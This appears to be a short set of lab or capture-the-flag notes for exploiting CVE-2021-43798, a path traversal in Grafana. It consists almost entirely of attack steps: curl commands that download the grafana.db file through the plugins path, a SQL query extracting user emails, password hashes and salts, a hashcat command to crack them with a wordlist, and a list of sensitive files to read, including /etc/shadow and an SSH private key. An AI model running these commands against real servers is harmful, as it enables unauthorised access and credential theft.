-
Get the database using CVE-2021-43798
curl 'http://10.10.77.156:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' --path-as-is --output grafana.db
-
Query the database and extract email, password and salt
select email,password,salt from user;
-
Save that output to a file (look at hashes.txt)
-
Run decoder.py script
python3 decoder.py > hash
-
Run hashcat to crack the passwords
hashcat -m 10900 hash /usr/share/wordlists/rockyou.txt
/etc/passwd
/etc/shadow
/etc/hostname
/etc/grafana/grafana.ini
/home/grafana/.ssh/id_rsa
/var/lib/grafana/grafana.db
-> curl -o grafana.db --path-as-is http://10.9.49.222:3000/public/plugins/welcome/../../../../../../../../var/lib/grafana/grafana.db